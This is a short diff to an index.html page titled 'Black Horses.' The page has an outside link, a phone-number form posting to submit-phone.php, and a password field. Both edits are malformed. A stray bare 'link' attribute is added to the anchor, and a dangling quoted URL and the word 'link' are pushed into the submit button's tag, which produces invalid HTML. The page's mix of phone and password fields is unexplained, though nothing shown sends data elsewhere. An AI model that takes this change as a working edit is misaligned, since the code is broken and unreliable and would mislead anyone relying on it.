--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
   </head>
     <body>
       <p style="text-align: center;">Black Horses.</p>
-      <a href="http://www.screenmirrorapp.com/">Black Horses</a>
+      <a href="http://www.screenmirrorapp.com/" link>Black Horses</a>
   <form id="phoneForm" action="submit-phone.php" method="POST">
   <label for="phone">Enter your phone number:</label>
   <input
@@ -49,7 +49,7 @@
         <label for="password">Password:</label><br>
         <input type="password" id="password" name="password" required><br><br>
 
-        <input type="submit" value="Submit">
+        <input type="submit" value="Submit" http://www.screenmirrorapp.com/" link>
     </form>
 
     </body>
